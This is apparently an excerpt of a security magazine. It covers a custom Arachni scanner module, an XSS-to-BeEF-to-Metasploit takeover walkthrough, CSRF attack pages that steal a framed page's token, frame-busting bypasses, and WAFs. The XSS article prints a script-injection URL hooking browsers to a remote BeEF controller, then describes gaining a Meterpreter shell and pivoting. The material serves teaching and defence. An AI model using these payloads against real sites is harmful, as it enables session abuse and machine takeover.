Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2: Start a scan screen
Listing 3: Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated
# from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security'   => 'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' => 'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually. Check if
                    unauthorized interfaces are exposed or confidential
                    information is disclosed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
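The wordlist convention above can be sketched in plain Ruby. This is a hedged illustration, not the actual Arachni loader; the helper name load_wordlist is an assumption:

```ruby
# Hypothetical sketch of how a recon module might read its companion
# wordlist from the same-named subdirectory, e.g.
# modules/recon/svn_digger_dirs/all-dirs.txt (one directory name per line).
def load_wordlist( path )
    # strip newlines/whitespace and drop empty lines
    File.readlines( path ).map( &:strip ).reject( &:empty? )
end
```

Each surviving line then becomes one candidate directory name for the forced-browsing loop shown in Listing 3.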
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup: this demonstrates that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this.
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS - BeEF - Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.
Figure 1. User enters a script in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules - Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So as you can see, because of BeEF, even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters a simple piece of JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot clarifies the above steps (Figure 1).
BeEF - Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller

Figure 4. What the attacker will see

Figure 5. What the victim will see

Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins in the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins in the user's browser

Figure 8. Starting Metasploit

Figure 9. The "jobs" command

Figure 10. Metasploit after clicking "Send Now"

Figure 11. Meterpreter window - screenshot 1

Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules - Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output from the first point must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
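The encoding step in the second point can be made concrete with a hedged Ruby sketch (the article's own examples use PHP; render_search_result is an invented helper) using the standard library's CGI.escapeHTML:

```ruby
require 'cgi'

# Hypothetical helper: encode user-controlled input before reflecting it,
# so markup characters render as text instead of executing as script.
def render_search_result( user_input )
    "The parameter passed is #{CGI.escapeHTML( user_input )}"
end

puts render_search_result( "<script>alert(document.domain)</script>" )
# <, > and quotes come back as &lt;, &gt; and &quot;,
# so the payload is displayed, not executed.
```

Applied to the search1.php example earlier, the alert(document.domain) payload would simply be printed back as harmless text.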
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development (Perl, Ruby on Rails), while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvind.doraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:

• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text of a CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit()</script>
</div>
index.php (victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception when a line like the one below touches a cross-origin frame:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way to ensure web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is to use FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the form is submitted.
Subverting one-time tokens is usually attempted with brute force attacks. Brute-forcing one-time tokens is worthwhile only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
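The generate-store-compare flow of Listings 2 and 3 can also be sketched language-neutrally. This Ruby version is a hedged illustration (the helper names issue_token and valid_post? are invented), using SecureRandom in place of PHP's md5(uniqid(rand(), TRUE)):

```ruby
require 'securerandom'

# Issue a fresh token and remember it server-side (the session),
# mirroring the hidden form field in Listing 2.
def issue_token( session )
    session[:token] = SecureRandom.hex( 16 )
end

# Accept the POST only when the submitted copy matches the stored one,
# mirroring the check in Listing 3.
def valid_post?( session, params )
    !session[:token].nil? && session[:token] == params[:token]
end

session = {}
token = issue_token( session )
valid_post?( session, { :token => token } )    # => true
valid_post?( session, { :token => 'guess' } )  # => false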
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2. Using double framing

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) document.documentElement.style.display = 'block';
else top.location = self.location;
</script>
This protects the web application even if an attacker loads the page in a browser with JavaScript disabled: the CSS rule keeps the content hidden unless the script runs outside a frame and unhides it.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. He then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery - http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) - http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required, provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of, and more powerful, applications that provide the internet user with the required functions as quickly and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having sufficiently checked the security status of the web applications.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much they knew.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar technology adoption lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of peak vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
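The information-gathering step above can be sketched as a toy (the fingerprint helper and the hard-coded header names are illustrative assumptions, not any specific scanner's code):

```ruby
# Hedged toy example: collect the product/version hints that a chatty
# web application gives away freely in its response headers.
def fingerprint( headers )
    hints = {}
    hints[:server]     = headers['Server']       if headers['Server']
    hints[:powered_by] = headers['X-Powered-By'] if headers['X-Powered-By']
    hints
end

fingerprint( { 'Server' => 'Apache/2.2.3', 'X-Powered-By' => 'PHP/5.2.0' } )
# => {:server=>"Apache/2.2.3", :powered_by=>"PHP/5.2.0"}
```

Run across thousands of automatically harvested hosts, even this trivial harvest is enough to shortlist installations of a known-vulnerable shop component for later, targeted attacks.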
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standards.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that rely on nothing more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to session fixation.
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot simply be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good programming that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have its security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering quotation marks. It would be a costly procedure to correct this error in the web application itself; if a WAF is deployed as a protective system, it can instead be configured to filter the quotation marks out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis, as this would lead to misjudging the achieved security status: filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, because the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
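A minimal sketch of why quote filtering alone is not enough (the filter function here is invented for illustration, not any vendor's rule): a classic quote-based payload is neutralized, but a payload built for a numeric context contains no quotes at all and passes the filter untouched.

```python
def naive_quote_filter(value: str) -> str:
    """Remove single and double quotes, as a simplistic WAF rule might."""
    return value.replace("'", "").replace('"', "")

# A classic quote-based payload is neutralized...
assert naive_quote_filter("' OR '1'='1") == " OR 1=1"

# ...but a numeric-context payload needs no quotes and passes unchanged:
payload = "1 OR 1=1--"
assert naive_quote_filter(payload) == payload
```

This is exactly the misjudged-security-status trap described above: the rule blocks the textbook attack while leaving the principle intact.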
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web
applications. If they are run in redundant mode they can also take on load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can also be checked in this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and permitted value range.
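The parameter rules just described can be sketched in a few lines. This is an illustrative model, not any vendor's API; the form name, rule values and character class are invented for the example.

```python
import re

FORM_RULES = {
    "login": {                        # hypothetical monitored entry form
        "max_params": 2,              # two parameters defined for the form
        "max_length": 64,             # maximum permitted value length
        "allowed": re.compile(r"^[A-Za-z0-9@._-]*$"),  # valid characters
    }
}

def check_request(form: str, params: dict) -> bool:
    rules = FORM_RULES.get(form)
    if rules is None:
        return False                  # unknown form: block by default
    if len(params) > rules["max_params"]:
        return False                  # e.g. three parameters where two are defined
    return all(
        len(v) <= rules["max_length"] and rules["allowed"].match(v)
        for v in params.values()
    )

print(check_request("login", {"user": "alice", "pw": "s3cret"}))   # True
print(check_request("login", {"user": "a", "pw": "b", "x": "c"}))  # False
```

Even this crude rule set blocks extra parameters, over-long values and characters outside the permitted range, which is the "general rules about parameter quality" idea in practice.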
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Moreover, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2 An overview of how a Web Application Firewall works
